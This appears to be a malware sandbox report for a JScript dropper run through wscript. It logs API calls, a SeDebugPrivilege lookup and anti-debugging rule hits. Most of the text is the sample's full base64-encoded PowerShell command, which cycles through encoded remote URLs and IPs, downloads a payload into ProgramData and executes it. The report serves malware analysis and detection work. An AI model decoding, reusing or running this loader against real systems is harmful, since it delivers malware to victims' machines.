QQBBADUAQQBDADQAQQBNAFEAQQB4AEEARABjAEEATABnAEEAMABBAEQAQQBBAHAAYwBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCADAAQQBHAGcAQQBlAFEAQgBzAEEARwBVAEEAYgBnAEIAbABBAEYAVQBBAGIAZwBCAHcAQQBHAHcAQQBkAFEAQgBuAEEASABNAEEATABnAEIAcgBBAEcAawBBAGIAUQBBAD0AIgA7ACQAVQBuAGsAaQBsAGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABNAEEATABnAEEAeABBAEQASQBBAE0AdwBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABJAEEATQBRAEEAMQBBAEEAPQA9AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABNAEEATQBnAEEAdQBBAEQARQBBAE4AdwBBADQAQQBBAD0APQAiADsAJABIAG8AdABwAHIAZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB5AEEAQwA0AEEATgBnAEEANABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQBMAGcAQQAzAEEARABjAEEAIgA7AA=="
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: wscript
parameters: "C:\ProgramData\subclan.js" unobliginglyPostpathologic NontraceableSchmalzy EyaletHardcopy EngraffedAnglophobist
filepath: wscript
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -encodedcommand "JABQAHIAZQBzAGEAYwByAGEAbABEAHIAYQBnAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAQQBBAEwAZwBBADUAQQBEAE0AQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAD0AbABkAHcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABNAEEATABnAEEAeQBBAEQAQQBBAE0AUQBBAHUAQQBEAEUAQQBOAEEAQQB5AEEAQwA0AEEATgBBAEEAeQBBAEEAPQA9AGwAZAB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAUQBBAE4AQQBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEAMgBBAEQAWQBBAEwAZwBBADQAQQBEAFkAQQAiADsAJABtAGUAdABhAGwAbABpAGsAZQBMAG8AZwBsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQA4AEEAZABnAEIAbABBAEgASQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEARwBVAEEAYwBnAEIARQBBAEcAawBBAFkAUQBCAG4AQQBIAEkAQQBZAFEAQgB0AEEARwAwAEEAWQBRAEIAMABBAEcAawBBAFkAdwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARwBJAEEAZABRAEIANgBBAEgAbwBBAHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEMAQQBHAFUAQQBZAFEAQgAyAEEARwBVAEEAYwBnAEIAbABBAEcAUQBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQA9AHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBZAFEAQgBwAEEARwB3AEEAWQBnAEIAdgBBAEcARQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQQB1AEEARwBNAEEAWQBRAEIAbQBBAEcAVQBBAHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAGsAQQBMAGcAQQAzAEEARABVAEEATABnAEEAeQBBAEQASQBBAE4AdwBBAHUAQQBEAFkAQQBOAFEAQQA9ACIAOwAkAGIAZQB0AGkAcgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAcwBBAEcATQBBAFkAUQBCADAAQQBHAFUAQQBWAEEAQgAzAEEASABrAEEAWgBRAEIAeQBBAEgATQBBAEwAZwBCAHAAQQBHADgAQQBQAGoAZwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHgAQQBIAFUAQQBZAFEAQgBrAEEASABJAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAHcAQQBiAHcAQgAxAEEASABNAEEAVQBBAEIAdgBBAEcAdwBBAGIAQQBCADEAQQBIAFEAQQBaAFEAQgB6AEEAQwA0AEEAZABnAEIAcABBAEgAQQBBAFAAagBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADAAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEAMgBBAEQASQBBAEwAZwBBAHgAQQBEAGcAQQBOAEEAQQA9AFAAagBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADEAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQQA9AD0AIgA7ACQAaAB5AHAAbwBpAG4AbwBzAGUAbQBpAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHADgAQQBjAHcAQgB6AEEARwBJAEEAWgBRAEIAeQBBAEgASQBBAGUAUQBCAFMAQQBIAFUAQQBiAFEAQgBpAEEASABVAEEAYwB3AEIAMABBAEcAawBBAGIAdwBCAHUAQQBDADQAQQBiAFEAQgB2AEEARwA0AEEAWgBRAEIANQBBAEEAPQA9AGwARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHAHcAQQBlAFEAQgBFAEEARwBrAEEAYQBBAEIANQBBAEcAUQBBAGMAZwBCAHYAQQBIAGcAQQBlAFEAQgBoAEEARwBNAEEAWgBRAEIAMABBAEcAOABBAGIAZwBCAGwAQQBDADQAQQBaAGcAQgBoAEEASABJAEEAYgBRAEEAPQBsAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABFAEEATABnAEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQAyAEEAQwA0AEEATQBRAEEANQBBAEQASQBBAGwARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEANABBAEQASQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABZAEEATwBBAEEAPQAiADsAJABDAHkAdABvAGcAZQBuAGUAdABpAGMAUABvAGUAdABpAHoAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGIAQQBCAGgAQQBHAGsAQQBkAEEAQgBvAEEARwBVAEEAYwB3AEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBAEkAZQBQAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABNAEEATQB3AEEAdQBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQAxAEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AZwBBAD0AIgA7ACQAVABpAG4AZwBlAG4AdABVAHAAZABhAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE4AUQBBAHUAQQBEAFUAQQBPAFEAQQB1AEEARABJAEEATQBnAEEAdwBBAEMANABBAE0AZwBBAHcAQQBEAEUAQQBMAHcAQgBTAEEASABZAEEATAB3AEIAVABBAEYASQBBAE4AdwBCAEkAQQBBAD0APQBRAGkAcgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAGMAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE4AdwBBADQAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATAB3AEIANgBBAEUAWQBBAGEAdwBCADUAQQBDADgAQQBkAEEAQgBhAEEARQBjAEEATQB3AEEAMABBAEEAPQA9AFEAaQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEMANABBAE4AZwBBADQAQQBDADgAQQBPAFEAQgBEAEEARwAwAEEATwBRAEIARgBBAEYAYwBBAEwAdwBCAEwAQQBIAGMAQQBVAHcAQgA2AEEARwBNAEEAYQBBAEIAMwBBAEEAPQA9AFEAaQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEMANABBAE8AUQBBAHkAQQBDADgAQQBTAGcAQgBVAEEARwBrAEEATAB3AEIAeABBAEYAVQBBAGQAUQBCAFQAQQBIAE0AQQBZAFEAQgBYAEEAQQA9AD0AUQBpAHIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEgATQBBAFUAQQBCAGkAQQBHAHMAQQBiAGcAQgBzAEEARQBRAEEATwBRAEIAdQBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFUAcgBiAGkAYwBvAGwAYQBlAEcAZQBuAGUAdABoAGwAaQBhAGMAaQBzAG0AIABpAG4AIAAkAFQAaQBuAGcAZQBuAHQAVQBwAGQAYQB0AGUAIAAtAHMAcABsAGkAdAAgACIAUQBpAHIAIgApACAAewAkAGMAaABlAG4AaQBlAHIAUwB3AGkAbgBnAGwAZQB0AGEAaQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAZABBAEIAcABBAEcANABBAFoAdwBCAGgAQQBIAEkAQQBaAFEAQgBsAEEARwBrAEEAYgBnAEIAbgBBAEUAdwBBAFkAUQBCAG4AQQBHADgAQQBiAFEAQgB2AEEASABJAEEAYwBBAEIAbwBBAEcAOABBAGQAUQBCAHoAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AVwB1AFcATABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAHcAQQBhAFEAQgB3AEEARwBRAEEAWQBRAEIAagBBAEcAZwBBAGMAdwBBAHUAQQBHAEUAQQBiAFEAQQA9AFcAdQBXAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBRAEEAdQBBAEQAVQBBAE8AUQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABFAEEATgBRAEEANABBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJABnAHIAbwB1AG4AZABzAGsAZQBlAHAAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATQBnAEEAegBBAEQAZwBBAEwAZwBBADEAQQBEAEEAQQBMAGcAQQA1AEEARABnAEEAaQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCAGoAQQBIAEkAQQBiAHcAQgB2AEEARwA0AEEAVAB3AEIAMgBBAEcAVQBBAGMAZwBCADAAQQBHAEUAQQBhAHcAQgBsAEEASABJAEEATABnAEIAbQBBAEcARQBBAGEAUQBCADAAQQBHAGcAQQAiADsAJABIAGUAbABsAGUAYgBvAHIAaQBuAGUASABhAGkAcgBzAHQAcgBlAGEAawAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABVAHIAYgBpAGMAbwBsAGEAZQBHAGUAbgBlAHQAaABsAGkAYQBjAGkAcwBtACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQASABlAGwAbABlAGIAbwByAGkAbgBlAEgAYQBpAHIAcwB0AHIAZQBhAGsAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwATQBpAHQAaQBnAGEAdABpAG8AbgBUAHIAaQBtAG0AaQBuAGcAbAB5AC4AYwBsAGEAdQBzAGUAcwA7ACQAYgBhAHMAawBlAHQAdwBvAHIAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAMwBBAEQAWQBBAEwAZwBBAHkAQQBEAFEAQQBNAGcAQQA9ACIAOwAkAEUAcwBjAGEAbABsAG8AcABzAE8AdgBlAHIAYQBzAHMAdQBtAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABNAEEATwBBAEEAdQBBAEQASQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB6AEEARABFAEEATABnAEEAMQBBAEQASQBBAGcAdwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHADQAQQBkAEEAQgBwAEEASABNAEEAWQBRAEIAMgBBAEcARQBBAFoAdwBCAGwAQQBFAGcAQQBaAFEAQgBoAEEARwBRAEEAYwB3AEIAbwBBAEcARQBBAGEAdwBCAGwAQQBIAEkAQQBMAGcAQgBqAEEASABJAEEAWgBRAEIAawBBAEcAawBBAGQAQQBBAD0AIgA7ACQAdABoAGUAcgBzAGkAdABlAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADUAQQBDADQAQQBPAEEAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQATQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQA9AEQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwA0AEEAWgBRAEIAMQBBAEgASQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgBzAEEARwBrAEEAYgBnAEIAcgBBAEEAPQA9AEQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBRAEEAMQBBAEMANABBAE0AUQBBADMAQQBEAGcAQQBMAGcAQQB4AEEARABJAEEATQBRAEEAdQBBAEQARQBBAE4AQQBBADAAQQBBAD0APQBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAeABBAEgAVQBBAFkAUQBCAHoAQQBHAGsAQQBjAEEAQgBsAEEASABJAEEAYQBRAEIAdgBBAEcAUQBBAGEAUQBCAGoAQQBFAHcAQQBhAFEAQgAwAEEARwBVAEEAYwBnAEIAaABBAEgAUQBBAFoAUQBCAHMAQQBIAGsAQQBMAGcAQgBpAEEARwA4AEEAZABRAEIAMABBAEcAawBBAGMAUQBCADEAQQBHAFUAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABNAGkAdABpAGcAYQB0AGkAbwBuAFQAcgBpAG0AbQBpAG4AZwBsAHkALgBjAGwAYQB1AHMAZQBzACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA5ADkANwAxADIAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBFADAAQQBhAFEAQgAwAEEARwBrAEEAWgB3AEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBWAEEAQgB5AEEARwBrAEEAYgBRAEIAdABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQQB1AEEARwBNAEEAYgBBAEIAaABBAEgAVQBBAGMAdwBCAGwAQQBIAE0AQQBMAEEAQgAyAEEARwBrAEEAYwBBAEIAegBBAEQAcwBBAFQAUQBCAEoAQQBGAFEAQQBUAEEAQgBwAEEARwBNAEEAWgBRAEIAdQBBAEgATQBBAFoAUQBBAD0AIgA7ACQAYwBhAGwAbwBtAGUAbABzAEIAZQBuAHoAbwBwAHkAcgBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAGMAQQBMAGcAQQB4AEEARABNAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADUAQQBDADQAQQBPAEEAQQAzAEEAQQA9AD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBOAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADIAQQBDADQAQQBNAFEAQQB6AEEARABJAEEAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAMgBBAEMANABBAE0AUQBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEAZgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAWQBBAEwAZwBBAHgAQQBEAEkAQQBOAFEAQQB1AEEARABFAEEATQBBAEEAMQBBAEEAPQA9ACIAOwAkAHMAYQB0AHUAcgBhAHQAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBBAEEAMgBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATABnAEEAeABBAEQATQBBAE4AQQBBAD0AIgA7ACQASgBlAG8AcABhAHIAZABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAHcAQgB3AEEARwB3AEEAWgBRAEIAdQBBAEcAawBBAGIAdwBCAHAAQQBHAFEAQQBUAEEAQgBoAEEASABBAEEAYwB3AEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9AFQAZgBKAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATQBBAEEAdQBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBOAGcAQQAzAEEAQwA0AEEATQBnAEEAeABBAEQATQBBACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7ACQAbgBvAG4AZQB4AHQAZQBuAHMAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBiAHcAQgB5AEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEcAQQBIAEkAQQBkAFEAQgBuAEEARwBFAEEAYgBBAEIAcABBAEgATQBBAGQAQQBBAHUAQQBIAE0AQQBhAEEAQgB2AEEARwBVAEEAYwB3AEEAPQBMAEIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEANABBAEMANABBAE0AUQBBAHcAQQBEAFkAQQBMAGcAQQAwAEEARABRAEEATABnAEEAeQBBAEQATQBBAE4AUQBBAD0ATABCAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEcAOABBAGMAdwBCAHoAQQBHAGsAQQBaAFEAQgBUAEEASABVAEEAWQBnAEIAaQBBAEcARQBBAGMAdwBCAHoAQQBDADQAQQBhAEEAQgB2AEEARwBNAEEAYQB3AEIAbABBAEgAawBBACIAOwB9AH0AJABwAGUAcgBqAHUAcgBlAGQAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEANQBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeQBBAEQAQQBBAE4AUQBBAD0AcABjAFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATwBBAEEAdQBBAEQASQBBAE4AQQBBADUAQQBDADQAQQBNAFEAQQB4AEEARABjAEEATABnAEEAMABBAEQAQQBBAHAAYwBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCADAAQQBHAGcAQQBlAFEAQgBzAEEARwBVAEEAYgBnAEIAbABBAEYAVQBBAGIAZwBCAHcAQQBHAHcAQQBkAFEAQgBuAEEASABNAEEATABnAEIAcgBBAEcAawBBAGIAUQBBAD0AIgA7ACQAVQBuAGsAaQBsAGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABNAEEATABnAEEAeABBAEQASQBBAE0AdwBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABJAEEATQBRAEEAMQBBAEEAPQA9AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABNAEEATQBnAEEAdQBBAEQARQBBAE4AdwBBADQAQQBBAD0APQAiADsAJABIAG8AdABwAHIAZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB5AEEAQwA0AEEATgBnAEEANABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQBMAGcAQQAzAEEARABjAEEAIgA7AA=="
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
parent_process wscript.exe martian_process powershell -encodedcommand "JABQAHIAZQBzAGEAYwByAGEAbABEAHIAYQBnAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAQQBBAEwAZwBBADUAQQBEAE0AQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAD0AbABkAHcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABNAEEATABnAEEAeQBBAEQAQQBBAE0AUQBBAHUAQQBEAEUAQQBOAEEAQQB5AEEAQwA0AEEATgBBAEEAeQBBAEEAPQA9AGwAZAB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAUQBBAE4AQQBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEAMgBBAEQAWQBBAEwAZwBBADQAQQBEAFkAQQAiADsAJABtAGUAdABhAGwAbABpAGsAZQBMAG8AZwBsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQA4AEEAZABnAEIAbABBAEgASQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEARwBVAEEAYwBnAEIARQBBAEcAawBBAFkAUQBCAG4AQQBIAEkAQQBZAFEAQgB0AEEARwAwAEEAWQBRAEIAMABBAEcAawBBAFkAdwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARwBJAEEAZABRAEIANgBBAEgAbwBBAHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEMAQQBHAFUAQQBZAFEAQgAyAEEARwBVAEEAYwBnAEIAbABBAEcAUQBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQA9AHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBZAFEAQgBwAEEARwB3AEEAWQBnAEIAdgBBAEcARQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQQB1AEEARwBNAEEAWQBRAEIAbQBBAEcAVQBBAHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAGsAQQBMAGcAQQAzAEEARABVAEEATABnAEEAeQBBAEQASQBBAE4AdwBBAHUAQQBEAFkAQQBOAFEAQQA9ACIAOwAkAGIAZQB0AGkAcgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAcwBBAEcATQBBAFkAUQBCADAAQQBHAFUAQQBWAEEAQgAzAEEASABrAEEAWgBRAEIAeQBBAEgATQBBAEwAZwBCAHAAQQBHADgAQQBQAGoAZwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHgAQQBIAFUAQQBZAFEAQgBrAEEASABJAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAHcAQQBiAHcAQgAxAEEASABNAEEAVQBBAEIAdgBBAEcAdwBBAGIAQQBCADEAQQBIAFEAQQBaAFEAQgB6AEEAQwA0AEEAZABnAEIAcABBAEgAQQBBAFAAagBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADAAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEAMgBBAEQASQBBAEwAZwBBAHgAQQBEAGcAQQBOAEEAQQA9AFAAagBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADEAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQQA9AD0AIgA7ACQAaAB5AHAAbwBpAG4AbwBzAGUAbQBpAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHADgAQQBjAHcAQgB6AEEARwBJAEEAWgBRAEIAeQBBAEgASQBBAGUAUQBCAFMAQQBIAFUAQQBiAFEAQgBpAEEASABVAEEAYwB3AEIAMABBAEcAawBBAGIAdwBCAHUAQQBDADQAQQBiAFEAQgB2AEEARwA0AEEAWgBRAEIANQBBAEEAPQA9AGwARwBhAEEAQgAwAEEASABRAEEAYwBBA